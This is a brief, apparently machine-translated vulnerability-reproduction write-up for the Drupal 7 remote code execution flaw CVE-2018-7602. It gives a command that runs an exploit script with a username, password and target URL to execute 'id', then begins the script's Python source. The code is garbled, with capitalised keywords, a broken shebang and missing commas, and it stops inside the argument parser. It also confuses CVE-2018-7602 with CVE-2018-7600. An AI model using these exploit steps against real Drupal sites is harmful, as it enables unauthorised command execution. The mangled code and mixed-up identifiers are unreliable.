Drupal remote code execution vulnerability (CVE-2018-7602)
Recurrence of vulnerabilities:
1. As shown in the following figure, the vulnerability can be reproduced by executing the following command. The example command is id, which can be executed as shown in the red box.
"id" is the command to be executed. The first drupal is the user name and the second drupal is the password python3 drupa7-CVE-2018-7602.py-c "id" drupal drupal http://ip:8081/.
two。 There has to be a PoC for CVE-2018-7600. #! / usr/bin/env python3
Import requests
Import argparse
From bs4 import BeautifulSoup
Def get_args ():
Parser = argparse.ArgumentParser (prog= "drupa7-CVE-2018-7602.py"
Formatter_class=lambda prog: argparse.HelpFormatter (prog,max_help_position=50)
Epilog=''
This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7